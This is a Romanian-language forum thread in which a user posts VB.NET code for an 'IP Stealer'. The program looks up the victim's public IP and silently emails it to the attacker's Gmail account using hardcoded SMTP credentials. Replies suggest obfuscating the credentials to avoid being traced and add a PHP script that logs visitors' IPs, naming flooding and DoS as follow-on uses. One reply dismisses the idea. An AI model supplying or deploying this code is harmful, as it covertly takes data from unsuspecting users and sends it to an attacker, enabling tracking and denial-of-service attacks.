Jump to content
nSnoopy

[VB.NET] IP Finder & IP Stealer

Recommended Posts

IP Finder:

Va arata intr-un textbox ip-ul ( Credits: 541 6339)

Adaugati:1 textbox1 button

Dati double-click pe button1 si adaugati:

        Dim stats As String        Dim webclient As New System.Net.WebClient        stats = System.Text.Encoding.ASCII.GetString(( _       webclient.DownloadData("http://whatismyip.com/automation/n09230945.asp")))        TextBox1.Text = stats

IP Stealer:

Dupa ce arata ip-ul va trimite pe adresa voastra de gmail

Adaugati:

1 textbox

1 button

dati double-click pe button1 si stergeti tot.dupa ce ati sters tot adaugati acest cod:

Imports System.Net.MailImports System.NetPublic Class Form1    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click        Dim stats As String        Dim webclient As New System.Net.WebClient        stats = System.Text.Encoding.ASCII.GetString(( _       webclient.DownloadData("http://whatismyip.com/automation/n09230945.asp")))        TextBox1.Text = stats        Dim mail As New MailMessage()        Dim SmtpServer As New SmtpClient        SmtpServer.Credentials = New Net.NetworkCredential("Your Mail@gmail.com", "Your gmail account password")        SmtpServer.Port = "587"        SmtpServer.Host = "smtp.gmail.com"        SmtpServer.EnableSsl = True        mail.To.Add("Your Mail@gmail.com")        mail.From = New MailAddress("YourMail")        mail.Subject = "IP Stealer"        mail.Body = (TextBox1.Text)        Try            SmtpServer.Send(mail)        Catch ex As Exception        End Try    End SubEnd Class

editati astfel:

Your Mail: Adresa de gmail catre care sa se trimita IP-ul

Your account password: Parola contului de gmail

Bafta

Edited by nSnoopy
Link to comment
Share on other sites

La un simplu reverse engineering, nu s-ar vedea contul e-mail si parola respectiva? Insemnand ca ti-ar da de urma la tot ce ai prins (in caz ca folosesti e-mail-ul ca un "database" central, unde vin mai multe informatii de la mai multe stealere spre exemplu) daca nu ai cripta, ascunde cumva datele respective (obfuscate)?

Link to comment
Share on other sites

bun si... iai gasit ip-ul... esti mai fericit ?:> nu prea ai ce face cu un ip decat sa floodezi sa faci un DoS ori alte jmeceherii sau sa aflii orasul si tara de unde provine ip-ul... in rest nu vad altceva de facut cu el :D si daca tot suntem la capitolul "furat" ip-uri uite si un simplu script PHP care face acelasi lucru dar intrun mod mai sexi

<?php
$ip = getenv(remote_addr);
$fh = fopen("ip.txt", 'a');
fwrite($fh, $ip."\n" );
fclose($fh);
?>

asta salveaza ip-urile intr-un fisier ip.txt in ordinea intrarilor pe pagina respectiva... adica pe coloana in jos :D

Edited by BogdanNBV
Link to comment
Share on other sites

1) Ideea de IP Stealing e penibila. Daca ruleaza programul tau, poti face orice pe acel PC, dar tu ii iei IP-ul? Apoi ce?

2) Metoda este extrem de stupida. Am vazut ca exista System.Net.Dns.GetHostByName si System.Net.Dns.GetHostName, dar ar fi de preferat API-urile (gethostbyname si gethostname). Sa descarci o pagina in care apare IP-ul si sa il citesti de acolo...

Oricum, felicitari, majoritatea "dorm", e bine ca mai sunt si oameni interesati de anumite lucruri.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...